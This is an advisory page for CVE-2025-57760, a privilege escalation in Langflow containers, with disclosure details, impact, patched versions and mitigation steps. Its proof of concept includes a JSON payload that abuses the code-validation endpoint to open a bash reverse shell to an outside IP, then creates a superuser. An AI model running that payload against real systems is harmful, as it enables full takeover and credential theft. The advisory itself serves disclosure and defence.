CVE-2025-57760 is a high-severity (CVSS 8.8) Improper Privilege Management vulnerability in langflow. A fix is available for langflow — see the affected versions and patch details below.
Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- A successful exploit gives an attacker total control of the affected component, not partial access.
Exploitation and automatability from CISA’s SSVC triage for CVE-2025-57760.
EPSS Exploitation Probability
Probability of exploitation in the next 30 days, from FIRST.org EPSS.
How urgent is this, really
Where this sits among everything scored
Real-World Exposure
langflow🐍langflow-baseReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
This vulnerability was discovered by researchers at Check Point. We are sharing this report as part of a responsible disclosure process and are happy to assist in validation and remediation if needed.
Summary
A privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command langflow superuser to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.
Details
Langflow's Docker image includes a CLI binary at /app/.venv/bin/langflow that exposes sensitive commands, including:
langflow superuser
This command allows creation of a new superuser without checking whether one already exists.
When combined with code execution (e.g., via the authenticated /api/v1/validate/code endpoint), a low-privileged user can execute:
/app/.venv/bin/langflow superuser
inside the container, and elevate themselves to full superuser privileges.
This effectively bypasses frontend role enforcement and backend user integrity, leading to full compromise of the Langflow application.
PoC
- Start container with LANGFLOW_ENABLE_AUTH set to True.
- Visit http://localhost:7860 and sign up. (Your user will not be marked is_superuser.)
- Exploit /api/v1/validate/code to get reverse shell
Send an authenticated POST request:
{
"code": "def foo(p=__import__('os').system(\"bash -c 'bash -i >& /dev/tcp/192.168.1.22/4444 0>&1'\")):\n pass"
}
- Inside reverse shell, create superuser:
- Log into UI as new superuser:
Impact
- Privilege escalation to superuser — complete takeover of the Langflow instance
- Access to all user data, flows, stored credentials, and configuration
- Credential leakage — attacker can extract third-party API keys
- Exposure of environment variables (inside docker container)
- Ability to run additional Langflow instances via
langflow runinside the container, which may lead to resource exhaustion (CPU, memory) and service degradation. - Full user management — superuser can delete other users, reset their passwords
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | langflow | all versions | 1.5.1pip install --upgrade 'langflow==1.5.1' |
| 🐍PyPI | langflow-base | all versions | 0.5.1pip install --upgrade 'langflow-base==0.5.1' |
Affected Products
langflowlangflowDetection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for langflow, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update langflow to 1.5.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2025-57760 is resolved across your whole dependency graph.
Workarounds
Close the privilege gap rather than the entry point: audit which accounts, roles and service identities can reach the affected operation, drop the component to the least privilege it actually needs, and review file and directory permissions created by earlier installs — a default left in place is what makes this reachable.
Frequently Asked Questions
Is CVE-2025-57760 in your dependencies?
Find it across PyPI, including transitive dependencies.